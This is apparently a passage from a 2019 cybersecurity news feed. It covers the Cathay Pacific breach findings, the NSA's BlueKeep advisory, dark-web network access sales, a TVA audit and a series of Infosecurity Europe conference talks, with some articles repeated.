The second group exploited a flaw on an internet facing server back in 2017, enabling them to gain admin access, move laterally and install credential harvesting tools. These credentials were used to access data via a VPN until May 2018.

Although the exploited vulnerability was first published in 2007, the airline claimed it was unable to upgrade because of compatibility problems with an Airbus fleet manuals app.

However, a scan it ran in 2017 did not spot the bug and Cathay also claimed that its anti-malware and endpoint protection tools didn’t spot any of the malware used in the second attacks because there were no signatures available, the report revealed.

The incidents were finally uncovered when group two tried to brute force the firm in March 2018 and it brought a cybersecurity expert on board to investigate.

Four of Cathay’s 120 IT systems containing personal data were affected: a customer loyalty system, a shared back-end database used to support web apps, a reporting tool and an air miles database.

The privacy commissioner criticized the airline for multiple security failings, including: failing to identify the server flaw, scanning at too wide an interval (yearly), exposing the admin console port of the server to the internet, failing to apply multi-factor authentication for all users accessing IT systems containing personal data, generating unencrypted database backup files, failing to reduce malware risks after the 2017 incident and failing to have an effective personal data inventory.

“In all the relevant circumstances of the case in relation to personal data security, the commissioner finds that Cathay did not take all reasonably practicable steps to protect the affected passengers’ personal data against unauthorized access in terms of vulnerability management, adoption of effective technical security measures and data governance, contravening DPP 4(1) of Schedule 1 to the Ordinance,” the commissioner concluded.

The airline also kept Hong Kong ID card details of affected passengers for longer than was necessary, it said.

Some 9.4 million passengers were affected by the breach, which Cathay Pacific finally revealed in October 2018.

However, while all had their names stolen by attackers and most had flight number and date (61%) and email address (53%) compromised, far fewer had membership number (38%), address (24%), phone number (19%), nationality (12%), passport number (9%), date of birth (8%) and ID card number (6%) affected.

Just 0.004% had credit card details stolen, suggesting that the motivation for the attacks may have been non-financial, which could potentially indicate nation state involvement.

Healthcare Orgs Hit with Destructive Attacks

Healthcare Orgs Hit with Destructive Attacks

Increasingly, healthcare organizations are the target of cyber-criminals looking to profit from the treasure trove of personal data these companies possess, according to a new report from Carbon Black.

The Healthcare Cyber Heist in 2019 report surveyed industry CISOs to understand the ways that threats to the industry have evolved. A vast majority (83%) of healthcare organizations reported an increase in cyber-attacks over the past year. “Invariably, when we talk to these CISOs, almost all of them are saying that the number of relevant and actionable security alerts they are receiving continues to climb year over year,” the report stated.

In addition, 66% admitted they were the target of a ransomware attack in the past year. “In targeting healthcare organizations, ransomware attackers are taking advantage of the 'do no harm' principle. Meaning, when forced to decide between paying a ransom or being unable to access critical patient files, the healthcare provider has no choice – they have to pay, lest a patient potentially incur great harm or loss of life,” the report said.

While 66% of healthcare organizations reported that cyber-attacks have grown more sophisticated over the past year, 84% also said that they have provided cybersecurity best-practices training to their employees.

“The potential, real-world effect cyber-attacks can have on healthcare organizations and patients is substantial,” said Rick McElroy, Carbon Black’s head of security strategy in a press release. “Cyber attackers have the ability to access, steal and sell patient information on the dark web. Beyond that, they have the ability to shut down a hospital’s access to critical systems and patient records, making effective patient care virtually impossible.”’

Despite their healthcare organizations being the target of cyber-attacks, CISOs reported that their top security concerns are actually related to compliance (33%), budget and resource restrictions (22%), loss of patient data (16%), vulnerable devices (16%) and inability to access patient data (13%).

For nearly half (45%) of participating healthcare organizations, attacks were targeted and intended to cause an extensive destruction of data, the report said. “These attackers aren’t just committing simple burglary or even home invasion – they’re arsonists. These attacks are often carried out by punitive and malicious nation-states, including Russia, China and North Korea,” the report said.

NSA Warns Windows Users to Upgrade, STAT

NSA Warns Windows Users to Upgrade, STAT

Microsoft Windows administrators and users are being urged by the National Security Agency (NSA) to verify that they are using a patched and updated system in order to protect against cyber-threats.

In a June 4 advisory, the NSA referenced recent warnings by Microsoft of a potentially 'wormable' remote code execution vulnerability (CVE-2019-0708), dubbed “BlueKeep,” that could spread across the internet without user interaction.

Despite Microsoft having issued a patch, the NSA said that potentially millions of users remain vulnerable.

“We have seen devastating computer worms inflict damage on unpatched systems with wide-ranging impact, and are seeking to motivate increased protections against this Remote Desktop Services (RDS) on legacy versions of the Windows® operating system,” the advisory stated.

“This is the type of vulnerability that malicious cyber actors frequently exploit through the use of software code that specifically targets the vulnerability. For example, the vulnerability could be exploited to conduct denial of service attacks. It is likely only a matter of time before remote exploitation tools are widely available for this vulnerability. NSA is concerned that malicious cyber actors will use the vulnerability in ransomware and exploit kits containing other known exploits, increasing capabilities against other unpatched systems.”

While newer versions of Windows are reportedly protected against this vulnerability, several versions remain at risk if not patched, including: Windows XP, Windows 7, Windows Vista, Windows Server 2003, Windows Server 2008 and Windows Server 2008 R2.

In a May 14 blog post, Microsoft noted that it has not yet observed any exploitation of this vulnerability, though there is a high likelihood that “malicious actors will write an exploit for this vulnerability and incorporate it into their malware.” However, an anonymous researcher has already published a proof-of-concept (PoC).

“Businesses who fail to heed the NSA's warning ignore it at their peril. Anyone looking for evidence to justify patching or moving off of legacy systems need only look at the damage left in the wake of NotPetya and WannaCry,” said Rick Holland, CISO, vice president of strategy at Digital Shadows.

“Maersk's financial statements clearly show the potential costs of 'wormable' vulnerabilities. In the short term, businesses should isolate the systems that must run legacy software. More strategically, companies must have a plan to retire unsupported systems, even if it takes several years.”

Australian Police Collect 9K+ Docs in ABC Raid

Australian Police Collect 9K+ Docs in ABC Raid

Outrage over the Australian Federal Police (AFP) raid at the Australian Broadcasting Corporation (ABC) continues to mount as a question of national security versus freedom of the press playing out between journalists and law enforcement.

In response to allegations that ABC had published classified information related to stories reported in 2017, the AFP raided ABC’s headquarters in Sydney and seized several documents, according to John Lyons, executive editor at ABC news, who was allowed in the room as several police officers combed through thousands of emails.

“They have downloaded 9,214 documents. I counted them,” Lyons told ABC news in a live interview. “They have set up a huge screen and they are going through email by email. It’s quite extraordinary. I’ve never seen an assault on the media as savage as this one I’ve seen on ABC.”

“The AFP have the power now to be going through those documents and essentially deleting anything they want. They can change material,” said Lyons who live-tweeted events as they unfolded.

The news is the second raid on members of the press in Australia in less than 24 hours. Combined with the recently passed Assistance and Access Bill, also known as the anti-encryption law, these raids are especially troubling. “Australia is heading down a path that leads to its citizens not being able to speak freely nor privately,” said Paul Bischoff, privacy advocate with

“When members of the press are targeted by their own governments, it's important for journalists to step up their cybersecurity and protect sources. If you cannot depend on the law to protect press freedoms, then journalists must take care to secure their communications, notes, drafts, data, documents and other materials. Most importantly, they need to encrypt their phones and laptops, connect to reputable virtual private networks (VPNs) and use secure communication channels with end-to-end encryption.”

#Infosec19: Mitigating Risks and Managing Third Party Threats

#Infosec19: Mitigating Risks and Managing Third Party Threats

Speaking at Infosecurity Europe 2019 on 'Effective Steps to Reduce Third Party Risk,' Scott W. Coleman, director of product management at Owl Cyber Defense, said that the average number of connections to a facility is 583. “Most are legitimate, but how many are appropriate” he asked.

He said that there are “vendors and companies and entities who need access to your plant, enterprise or base” and while many have a good reason to have access, you need to be sure that they are not presenting a risk that you don’t need.

Coleman recommended determining what you need to protect, which connectors and disaster recovery systems you need to protect, and which vendor service level agreements you need to maintain “but be subversive on what needs to have access.”

He encouraged companies to focus on the following when evaluating a third party: which products and services require access; which companies have a higher level of personnel turnover; who have been involved in breaches themselves “as a lot of the time, a company has a third party connecting” so depending on their level of cybersecurity.

Looking at strategies for mitigation, Coleman asked if many people will know who the 583 people are, and what access they have if you have a good handle on what they are doing? “Understand and measure what they are doing as it is hard to protect against them,” he said.

Next, he recommended looking at what value and risk is presented and added to you by third party access, and apply resources to the highest risk and which assets are being touched. He said you should seek to reduce your footprint and the number of things you focus your resources on, and apply this posture to things the third parties affect.

“The bottom line is segmenting and least privilege,” he said. “The biggest problem is coming in laterally and if you put in segmentation and proper privilege, prevent movement and what all have access to. “

He said that the final way to mitigate is to use a zero trust approach, and the problem is that “trust but verify” is hard to achieve in practise. “The problem is when you take your eye off it, you no longer have the trust factor.”

He concluded by pointing to the Department of Homeland Security’s strategies for mitigating risk for third parties. These are recommend as:

  • Reduce/eliminate connections in/out the network
  • Convert two-way connections to one-way out of the plant
  • Convert two-way connections to one-way into the plant
  • Secure remaining two-way connections

#Infosec19: MITRE ATT&CK Framework Effective in Defending CNI

#Infosec19: MITRE ATT&CK Framework Effective in Defending CNI

Speaking at Infosecurity Europe 2019 Andrew Habibi-Parker, director – professional services, EMEA & APJ at LogRhythm, explored security risks surrounding critical national infrastructure (CNI) and outlined why the MITRE ATT&CK Framework can be pivotal in defending and protecting critical infrastructures.

Habibi-Parker explained that there are some critical elements of national infrastructure such as assets, facilities, systems and networks which, in the event of a compromise, can be targeted by attackers to effect the integrity or delivery of essential services, resulting in significant impact on national security, national defense or the functioning of the state.

He said the “UK Government’s cyber strategy and NIS Directive is playing a key role in helping improve cybersecurity in UK CNI organizations” but added that the rapid emergence of new vulnerabilities and malicious actors’ smarter tactics make it “impossible to completely secure CNI networks and systems.” A focus on reducing detection and response times is therefore crucial, Habibi-Parker explained, and that’s where the MITRE ATT&CK Framework can be very effective.

That’s because MITRE ATT&CK “uses real world intelligence on the TTPs used by APT groups.” It’s a great way to validate and improve your detection, incident handling and continuous monitoring capabilities, Habibi-Parlker said.

However, Habibi-Parker was quick to point out that MITRE ATT&CK is not “a replacement for cybersecurity best practices” nor is it a list of fully-achievable objectives. It may also not be the right choice for an organization that does not have a SOC, he added, and “implementing monitoring of endpoints and behavioral analytics is critical to success.”

#Infosec19: Passwords Are Here to Stay, Warns Troy Hunt

#Infosec19: Passwords Are Here to Stay, Warns Troy Hunt

Five years from today there will be more passwords in use than at present – despite their inherent security failings – according to HaveBeenPwned founder Troy Hunt. 

Presenting the Infosecurity Hall of Fame Annual Lecture on the last day of Infosecurity Europe today, Hunt sought to dispel some common misconceptions about cybersecurity.

HaveIBeenPwned started as a “fun project” back in 2013 and the free site now has over 7.8bn compromised accounts listed, which users can check to see if they have been breached.

Unfortunately, passwords are here to stay despite the emergence of solutions like multi-factor authentication which are far more secure, Hunt warned.

“They may be good technical solutions … but every single person in this room knows how to use a password, as bad as it is security wise,” he argued.

This usability will always trump security concerns, but organizations can and should make log-ins more robust by enhancing passwords with password managers and U2F keys, he added.

The dark web is often blamed for providing a platform for cyber-criminals to trade such credentials online, but the surface web is also a major offender, Hunt claimed.

He showed a screenshot of a single Twitter account which posted MEGA links to the notorious “Collection” combo lists, publicly exposing billions of unique emails and passwords, for example.

That’s not all: YouTube is awash with “hundreds” of how-to videos, detailing the simple steps budding cyber-criminals can take to launch SQLi attacks, credential stuffing and more, Hunt claimed.

Some of those he played on stage appeared to be voiced by teens, highlighting another misconception about cybercrime: that it tends to be the work of hardened, organized gangs.

One former law enforcer was quoted following the TalkTalk attack as suggesting it was the work of “Russian Islamic cyber jihadis,” for example. In reality, the breach, which cost the telco £77m, was mainly down to a 17-year-old boy.

“The damage [kids] can do is massive. So many children have access to this [hacking] information that anyone can use it without knowing the problems it can cause,” he argued. “We’ve got to do more to set kids back on the right path.”

The National Crime Agency’s Cyber Choices campaign highlights the scale of the problem, and the need to raise awareness among parents of what their kids may be up to.

#Infosec19: “We Can Build Safe 5G Networks Irrespective of Supplier” – NCSC

#Infosec19: “We Can Build Safe 5G Networks Irrespective of Supplier” – NCSC

Governments and industry need to “focus on fixes, not fear,” and work out how to build safer 5G networks rather than obsessing about national security concerns leveled at suppliers, according to the National Cyber Security Centre (NCSC).

NCSC boss, Ciaran Martin, told attendees on day three of Infosecurity Europe this morning that the next generation of network infrastructure can be architected in a way that mitigates risks posed by vendors.

Referring to a tabloid headline which claimed Huawei could theoretically turn off all the household appliances in UK smart homes if allowed to build 5G, he argued: “We don’t have to build 5G networks that way and I’d argue we shouldn’t.”

Martin added: “We have to get 5G network security right, and that is a much bigger issue than the national identity of suppliers.

“It would be a real shame if we allowed fear back into cybersecurity. People need to understand the risks, and we, as experts, need to understand and explain how network security can be [implemented] to give a satisfactory level of assurance.”

The UK government has worked hard over the past few years to move from a fear-based approach to cybersecurity to a pragmatic one, he claimed.

Part of the journey towards a more mature approach to cybersecurity means promoting pragmatic ways to tackle threats rather than glamorizing attacks.

“Cybersecurity is not something we should be scared of and not something we should scare people about,” argued Martin. “The first step is to understand that and the diversity of it and [not promote] cybersecurity as a big technical ball of risk that non-technical people can’t understand.”

To help in this, the NCSC has produced a “five questions for boards” document, so that business leaders are better equipped to discuss issues in-depth with CISOs.

“You don’t all have to be cyber experts, but you need to know how to talk to cyber experts,” Martin added.

Quick wins could be had from focusing on improving baseline security, he added, claiming that the notorious state-sponsored Cloudhopper attackers managed to infect some victims using a 19-year-old virus because they were running outdated systems and flat networks.

Martin concluded on a note of optimism, claiming that, unlike the start of the digital revolution 20 years ago, industry experts can see a lot of what’s coming down the road. By working “seriously, dispassionately and transparently,” progress can be made to eradicate structural vulnerabilities, he argued.

#Infosec19: DNS Rebinding Attacks Could Hit Billions of IoT Devices

#Infosec19: DNS Rebinding Attacks Could Hit Billions of IoT Devices

DNS rebinding attacks are a real threat that could hit the billions of internet of things (IoT) devices in people’s homes, according to Craig Young, principal security researcher at Tripwire.

Young was speaking in the Geek Street Theatre on day three of the Infosecurity Conference at London’s Kensington Olympia.

During the session, Young explained the impact of the threat – which turns a victim’s browser into a proxy for attacking private networks – within IoT. “Over the years, I have found countless vulnerabilities in IoT products,” he said.

This is partly because IoT often uses HTTP, which is vulnerable to DNS rebinding. In the future, the consequences could be significant: Rebinding also opens new doors for botnets, according to Young.

“The problem is, defenders seem to discount this as a real threat, but in the future, someone might want to create a botnet and there will be more hosts to target,” he said.

During his research, Young found devices including the Google Home smart speaker were vulnerable to DNS rebinding attacks. “I was able to ask the Google Home to give me IP addresses of nearby access points so I could tell where devices were,” he explained.

Another class of devices vulnerable to DNS rebinding are IoT units using standards-based web services access protocol SOAP. “You can use this to steal data, disable devices and brick them,” he said.

Young said vulnerable IoT devices included the Belkin Wemo smart outlet and the Sonos connected speaker – the latter of which allowed him to play false content and rename or reset the device.

In order to prevent DNS rebinding attacks, Young advises mitigation at the DNS layer, segmenting networks, using the NoScript extension for Firefox or “various adblockers.”

At the same time, Young said: “Devices and everything else should be using HTTPS – which is not affected by DNS rebinding. All apps need authentication: Even if it’s a home network, it should have some kind of credential mechanism.”

#Infosec19 Dark Web Sales Offer Network Access for $10,000

#Infosec19 Dark Web Sales Offer Network Access for $10,000

Access to FTSE 100 and Fortune 500 corporate networks has increased on the dark web.

According to research by Bromium and the University of Surrey, presented at Infosecurity Europe, four in ten dark net vendors are selling targeted hacking services aimed at FTSE 100 and Fortune 500 businesses, while there has been a 20% rise in the number of dark net listings in the last three years, specifically “with a direct potential to harm the enterprise.”

The most heavily targeted industries were identified as banking (34%), ecommerce (20%), healthcare (15%), and education (12%). Also, with threats tailored to specific industries or organizations outnumber off-the-shelf varieties by a ratio of 2:1.

“Almost every vendor offered us tailored versions of malware as a way of targeting specific companies or industries,” said Dr. Mike McGuire, Senior Lecturer in Criminology at the University of Surrey. “The more targeted the attack, the higher the cost, with prices rising even further when it involved high-value targets like banks. The most expensive piece of malware found was designed to target ATMs and retailed for approximately $1,500.”

Access to corporate networks is sold openly; 60% of vendors approached by researchers offered access to more than ten business networks each and 70% of dark net vendors engaged invited researchers to talk on encrypted messaging applications, like Telegram, to take conversations beyond the reach of law enforcement.

Speaking to Infosecurity, Bromium president and co-founder Ian Pratt said that dark web “stores” are often just a “shop window” to sell services, and most transactions usually take place over encrypted communication channels like Signal and Telegram.

“The dark web is not an index, but a bunch of sites separate from the regular web,” Pratt said. He also said that access to networks is commonly sold for around $10,000, but it is not too hard to determine what a company uses. “Also it is not even zero-days, it is bypassing detection-based systems,” he said.

Pratt also said that many cyber-criminals now have separate supply chains to provide language services, and tailored malware for the attack. One example is the Emotet banking Trojan, which is often used as an initial dropper for the initial malware infection, and then command and control access is sold, while the payload scrapes the credentials while the Trojan is re-used for cryptojacking.

Aside from access to financial services and e-commerce, healthcare information was targeted by 15% of actors. Pratt explained that commonly, the information is held for ransom and if the ransom is not paid, the details are released.

“The methods for providing access varied considerably,” Dr. McGuire explained. “Some involved stolen remote access credentials that are for sale for as little as $2, others involve backdoor access or the use of malware. Illicit remote access tools appear to be most popular – we were offered Remote Access Trojans at least five times more often than keyloggers.

“Enterprises, researchers, and law enforcement must continue to study the dark net to get a deeper understanding of the adversaries that we are dealing with, and better prepare ourselves for counteracting the effects of a growing cybercrime economy.”

Tennessee Valley Authority Isn’t Compliant with Federal Directives

Tennessee Valley Authority Isn't Compliant with Federal Directives

The Tennessee Valley Authority (TVA) inspector general has reported that 115 TVA registered domains were found not meeting the Department of Homeland Security (DHS) standards for cybersecurity during an audit earlier this year. A memo published by the TVA Inspector General's Office on May 29, 2019, reported that internal auditors also found that encryption requirements were inadequate on 20 TVA websites. 

The review was part of an annual audit plan to ensure that the TVA was compliant with two federal directives that require website and email security controls. These controls had to comply with the Office of Management and Budget’s (OMB) memorandum M-15-13, Policy to Require Secure Connections across Federal Websites and Web Services, and DHS's binding operational directive (BOD) 18-01, Enhance Email and Web Security, regarding website and email security practices.

According to David Wheeler, the assistant inspector general for audits and evaluations, the TVA was found not to be compliant with OMB A-15-13 and DHS BOD 18-01. "In addition, we found that TVA's web site inventory was incomplete." These findings were formally communicated to TVA management on March 26, 2019.

The fieldwork for the audit was carried out from November 2018 to March 2019.  The team obtained and reviewed TVA's website inventory from the TVA's cybersecurity personnel and compared it to the population of identified publicly accessible websites, according to the memo from Wheeler. Internet domain listings were also collected. These findings were then scanned using tools to determine compliance with OMB A-15-13 and DHS BOD 18-01 requirements. Out of 116 domains, 115 did not meet requirements, with encryption requirements inadequate on 20 out of 55 TVA websites. 

This left TVA emails and websites open to attacks, such as phishing. Research by IRONSCALES found that secure email gateways (SEG) failed to 99.5% of all nontrivial email spoofing attacks. A two-year analysis of more than 100,000 verified email spoofing attacks found that the most common spoofing techniques included sender name impersonations and domain look-alike attacks, bypassing SEG technology on a regular basis. 

In his memo, Wheeler recommended that email security policies for domains needed to be updated to meet requirements, reviewing them on a periodic basis for compliance. He also wrote: "Update websites that were not compliant with OMB M-15-13 and DHS BOD-18-01 requirements, and review on a periodic basis for compliance" as well as review website inventory.

TVA management agreed with the audit findings and recommendations in this report, according to the memo. 

UK Hasn’t Made Sufficient Progress in National Security Strategy

UK Hasn't Made Sufficient Progress in National Security Strategy

The Public Accounts Committe has found that the UK government has not made sufficient progress on developing long-term objectives for the National Security Strategy.

According to the announcement made today, a weak evidence base and a lack of a business case for the National Cyber Security Programme made it difficult for the Cabinet Office to assess whether it will meet all its objectives by 2021.

The National Cyber Security Centre (NCSC) has dealt with over 1100 cybersecurity incidents since it was established in October 2016. CSC chair Meg Hillier says that the UK will need to protect itself against risks created by more and more services going online, but there is concern that consumers do not know how well they are protected: "We welcome the National Cyber Security Strategy but are concerned that the program designed to deliver it is insufficient," she explained. 

"As it currently stands, the strategy is not supported by the robust evidence the department needs to make informed decisions and accurately measure progress. On top of this, neither the strategy or the program were grounded in business cases – despite being allocated £1.9bn funding.

"Looking longer term, we are disappointed that the department was not able to give us a clear idea of what the strategy will deliver by 2021. This does not represent a resilient security strategy."

Since 2011, the Cabinet Office has managed two five-year national cybersecurity strategies. According to the report, it is beginning to make progress in meeting the strategic outcomes of the current one, the 2016–2021 National Cyber Security Strategy, after a poor start.

But the report has also found that as well as a weak evidence base, it is also unclear whether the money allocated at the start of the program was the right amount, making it more difficult to judge value for money. 

A third (£169m) of the program’s planned funding for the first two years was either transferred or loaned to support other government national security priorities, such as counterterrorism activities, according to the Public Accounts Committee. Some £69m of this funding will not be returned to the program, which seems at odds with the government’s claim that cybersecurity is a priority.

The recommendations made include the Cabinet Office ensuring another long-term coordinated approach to cybersecurity is put in place in advance of the current one, which finishes in March 2021. Further, it has suggested that a business case should be produced. 

The CSC has asked the Cabinet Office to write to it by November 2019, setting out what progress it is making in using evidence-based decisions in prioritizing cybersecurity work. This includes plans for undertaking robust "lessons learned" exercise.

It is also expected that the Cabinet Office will publish its costed plan for the strategy in autumn 2019. 

UK Hasn’t Made Sufficient Progress for National Security Strategy

UK Hasn't Made Sufficient Progress for National Security Strategy

The Commons Select Committee (CSC) has found that the UK government has not made sufficient progress on developing long-term objectives for the National Security Strategy.

According to the announcement made today by the CSC, a weak evidence base and a lack of a business case for the National Cyber Security Programme made it difficult for the Cabinet Office to assess whether it will meet all its objectives by 2021.

The National Cyber Security Centre (NCSC) has dealt with over 1,100 cybersecurity incidents since it was established in October 2016. CSC chair Meg Hillier says that the UK will need to protect itself against risks created by more and more services going online, but there is concern that consumers do not know how well they are protected: "We welcome the National Cyber Security Strategy but are concerned that the program designed to deliver it is insufficient," she explained. 

"As it currently stands, the strategy is not supported by the robust evidence the department needs to make informed decisions and accurately measure progress. On top of this, neither the strategy or the program were grounded in business cases – despite being allocated £1.9 billion funding.

"Looking longer term, we are disappointed that the department was not able to give us a clear idea of what the strategy will deliver by 2021. This does not represent a resilient security strategy."

Since 2011, the Cabinet Office has managed two five-year national cybersecurity strategies. According to the report, it is beginning to make progress in meeting the strategic outcomes of the current one, the 2016–2021 National Cyber Security Strategy, after a poor start.

But the report has also found that as well as a weak evidence base, it is also unclear whether the money allocated at the start of the program was the right amount, making it more difficult to judge value for money. 

A third (£169 million) of the program’s planned funding for the first two years was either transferred or loaned to support other government national security priorities, such as counterterrorism activities, according to the CSC. Some £69 million of this funding will not be returned to the program, which seems at odds with the government’s claim that cybersecurity is a priority.

The recommendations made by the CSC include the Cabinet Office ensuring another long-term coordinated approach to cybersecurity is put in place in advance of the current one, which finishes in March 2021. Further, it has suggested that a business case should be produced. 

The CSC has asked the Cabinet Office to write to it by November 2019, setting out what progress it is making in using evidence-based decisions in prioritizing cybersecurity work. This includes plans for undertaking robust "lessons learned" exercise.

It is also expected that the Cabinet Office will publish its costed plan for the strategy in autumn 2019. 

SentinelOne Secures $120 Million Series D Funding

SentinelOne Secures $120 Million Series D Funding

SentinelOne has raised $120 million in Series D funding, bringing its total funding to over $230 million. 

According to the press release, the funding will be used to accelerate the company's "rapid displacement of legacy and next-gen competitors" in endpoint, cloud and internet of things (IoT) protection. It is led by Insight Partners, with participation from Samsung Venture Investment Corp., NextEquity and previous investors, including Third Point Ventures, Redpoint Ventures, Granite Hill and Data Collective (DCVC), among others. 

The company's patented behavorial artificial intelligence (AI) provides real-time prevention and ActiveEDR in the edge and the cloud. It does this through a cloud-native platform with no reliance on connectivity or updates. 

“We’ve built a team and technology to disrupt and broaden the endpoint space: as the network perimeter is drastically changing, so does the notion of the endpoint,” said Tomer Weingarten, CEO and co-founder of SentinelOne. “Endpoints are everywhere today, from classic laptops and desktops to workloads in the cloud and the data center and all IoT devices – the network edge is the real perimeter. 

"We were the first to unify EPP [endpoint protection platform] and EDR [endpoint detection and response] – prevention, detection, response and hunting – in a single autonomous agent; we were the first to stand behind our product with a cyber warranty; now we are the first to take AI-based device protection to the edge, covering IoT endpoints and workloads in the cloud."

SentinelOne said in its press release that it is the fastest growing endpoint security company on the market, achieving 217% year-over-year (YoY) growth in annual recurring revenue and 140% YoY growth in Fortune 500 bookings. Teddie Wardi, managing director at Insight Partners, said that endpoint security is at a "fascinating point of maturity...Attack methods grow more advanced by the day and customers demand innovative, autonomous technology to stay one step ahead." 

"We recognize SentinelOne’s strong leadership team and vision to be unique in the market," he continued, "as evidenced through the company’s explosive growth and highly differentiated business model from its peer cybersecurity companies.”

“As an investor, SentinelOne’s combination of best-in-class EPP and EDR functionality is a magnet for engagement, but it’s the company’s ability to foresee the future of the endpoint market that attracted us as a technology partner,” said a representative from Samsung. “Extending tech stacks beyond EPP and EDR to include IoT is the clear next step, and we look forward to collaborating with SentinelOne on its groundbreaking work in this area.”

#Infosec19: Identify and Protect your Very Attacked People

#Infosec19: Identify and Protect your Very Attacked People

Identify and protect your “very attacked people” (VAP) as attackers look for high value targets.

Speaking at Infosecurity Europe in London, Paul Down, senior director of Proofpoint said that when attackers look to get information or money, a year ago they would do a mass email campaign and use automated bots. However this year they are not, and instead of emailing “info@” addresses, campaigns are now more well researched and targeted.

Down said that VAPs are typically “high value executives” such as the CEO who do not have high levels of account privilege, but do have access to financial information. Meanwhile a “high access user” has sign off on accounts and information, and a target for value or information for the attacker. 

The top 20 email addresses for a VAP are typically led by a PR manager, as they are very public and listed on every website. “They go for PR@, or accounts@, or sales@ as they have a wide distribution list, and we typically see a 40% click rate on threats delivered to untrained people, so why not do mass email to info@ as many will see it,” he said.

Down said that the CEO is “a lot less targeted” but be more likely sent a business email compromise email or banking Trojan. “The attackers are not looking to compromise the endpoint or perimeter, but target a person,” he said. 

Pointing at their State of Phish research, Down said that 30-40% of respondents knew what phishing is, and people aged 22-37 (millennials) are more likely to click.

Research also showed that people in commercial positions (19%) are more likely to fail at detecting a phishing email, followed by purchasing (14%), communication (13%) and sales (13%).

Down concluded by saying that a focus on “people-centric risk reduction” will enable you to determine your level of risk in the organization, identify your VARs and high risk people. 

“Think on changing behavior and risks,” he said, explaining that simulated phishing exercises can be sourced for free and if a user fails, reply with an exercise that states “you shouldn’t click that, it was a simulated phish, we will send you some training now” as they will not remember the email the following week.

“Once an employee is phished and trained, they become the last line of defense and the best format to report phishes that do come through.”

#Infosec19 Identify and Protect your Very Attacked People

#Infosec19 Identify and Protect your Very Attacked People

Identify and protect your “very attacked people” (VAP) as attackers look for high value targets.

Speaking at Infosecurity Europe in London, Paul down, senior director of Proofpoint said that when attackers look to get information or money, a year ago they would do a mass email campaign and use automated bots. However this year they are not, and instead of emailing “info@” addresses, campaigns are now more well researched and targeted.

Down said that VAPs are typically “high value executives” such as the CEO who do not have high levels of account privilege, but do have access to financial information. Meanwhile a “high access user” has sign off on accounts and information, and a target for value or information for the attacker. 

The top 20 email addresses for a VAP are typically led by a PR manager, as they are very public and listed on every website. “They go for PR@, or accounts@, or sales@ as they have a wide distribution list, and we typically see a 40% click rate on threats delivered to untrained people, so why not do mass email to info@ as many will see it,” he said.

Down said that the CEO is “a lot less targeted” but be more likely sent a business email compromise email or banking Trojan. “The attackers are not looking to compromise the endpoint or perimeter, but target a person,” he said. 

Pointing at their State of Phish research, Down said that 30-40% of respondents knew what phishing is, and people aged 22-37 (millennials) are more likely to click.

Research also showed that people in commercial positions (19%) are more likely to fail at detecting a phishing email, followed by purchasing (14%), communication (13%) and sales (13%).

Down concluded by saying that a focus on “people centric risk reduction” will enable you to determine your level of risk in the organization, identify your VARs and high risk people. 

“Think on changing behavior and risks,” he said, explaining that simulated phishing exercises can be sourced for free and if a user fails, reply with an exercise that states “you shouldn’t click that, it was a simulated phish, we will send you some training now” as they will not remember the email the following week.

“Once an employee is phished and trained, they become the last line of defense and the best format to report phishes that do come through.”

#Infosec19: Complex Legacy IT Problems Can’t Be Solved with Simple Solutions

#Infosec19: Complex Legacy IT Problems Can't Be Solved with Simple Solutions

“Complex problems cannot be solved with simple solutions.” These were the words of Bobby Ford, VP & Global CISO at Unilever, speaking at Infosecurity Europe 2019.

Ford said that the complex challenge of the security risks posed by legacy systems exists in all industries.

He added that a big part of the problem is that we cannot simply decommission legacy IT systems because they support “some critical business processes, and because of that, we can’t just get rid of them.”

“Our systems are ageing and our ability to replace them is slowing down. As these systems age, the threat increases for them. We can’t update the systems fast enough to stay in front of the threat.”

If you look back at some of the biggest recent cyber-attacks, Ford continued, you will see that legacy systems were at the heart of most of them.

“It’s a complex problem and it’s not going away anytime soon,” he said. “These legacy IT systems equate to business risk, and it’s important that we understand that when we are talking about patching we are talking about business risk. Business risk isn’t a system going down; business risk is an inability to ship a product, business risk is saying ‘I can’t manufacture goods,’ business risk is being unable to invoice a customer.”

So when we talk about dealing with the risk of legacy IT systems, it’s important we do so in business risk language, Ford said, and solving the problem comes down to having “engaging conversations with our business partners to understand our most critical business systems.

“We can’t define what’s most critical, only the business can define what’s most critical.”

To conclude, Ford explained that the key to succeeding with dealing with the risks surrounding legacy systems is prioritization. “I’ve said this my entire career; if we are going to be successful as professional security risk managers, we have to be able to prioritize. We cannot do everything and we can’t secure all systems. We have to work with the business to identity the most critical systems, and then try to secure them.”

#Infosec19: Former Lloyd’s CEO Says Collaboration is Key to Future of Cyber Insurance

#Infosec19: Former Lloyd’s CEO Says Collaboration is Key to Future of Cyber Insurance

Insurers must collaborate more closely with each other and technology firms to improve their understanding of cyber risk and better serve their customers, the former CEO of Lloyd’s of London has argued.

Speaking at Infosecurity Europe today, Inga Beale, explained that cybersecurity-related risk is one of the biggest rising risks facing global businesses, but also the one they arguably know least about.

“We’re trying as a sector to start collaborating together, with governments and with technology pioneers to gather data on all the incidents out there … to understand the scenarios in order to get pricing right,” she explained. “Insurance can be a wonderful way to mitigate risk.”

Lloyd’s is leading the way on this front, by hiring cybersecurity experts of its own to analyze anonymized data to uncover insights. It now accounts for around a quarter of global cyber insurance sold today, Beale claimed.

The data itself needs to cover a broad sweep of areas, not just technical information but also things like staff training, which is a “big factor” insurers take into account when drawing up premiums, she continued.

More generally, Beale bemoaned a persistent communications challenge between CISOs and board members. Although boardroom complacency about the cyber threat has largely disappeared: “Most of the time we don’t understand what’s being said,” she argued.

This can lead to board members asking the wrong questions because they “don’t want to appear dumb” and security leaders answering questions that haven’t been asked, Beale added.

“We need a feeling of trust and safety that it’s genuinely OK to have a conversation about what the board members don’t understand and what the experts think are the biggest risks,” she said. “Because board members hate it if risk isn’t under control.”

A tactic employed by Lloyd’s to tackle this challenge is to have one or two tech experts on the board, although diversity in terms of members’ backgrounds is also important, Beale argued. Similarly, CISOs should help by dropping the technical talk and engaging on a personal level.

“Just having a list of metrics or dashboards is probably not the most helpful to a board,” she added.

“It’s curiosity, conversations and exploring everything, and never being happy with the status quo [that’s most important]. You need the intervention of the human mind.”

#Infosec19: Security Must Support Digital Transformation & Enable the Business

#Infosec19: Security Must Support Digital Transformation & Enable the Business

At Infosecurity Europe 2019 Ewa Pilat, global CISO at Jaguar Land Rover, explored how the security function can and must support and enable the business through a process of digital transformation.

Pilat explained that digital transformation can mean different things to different organizations, but that as security professionals, “we need to understand it properly in order to provide support in digital transformation.”

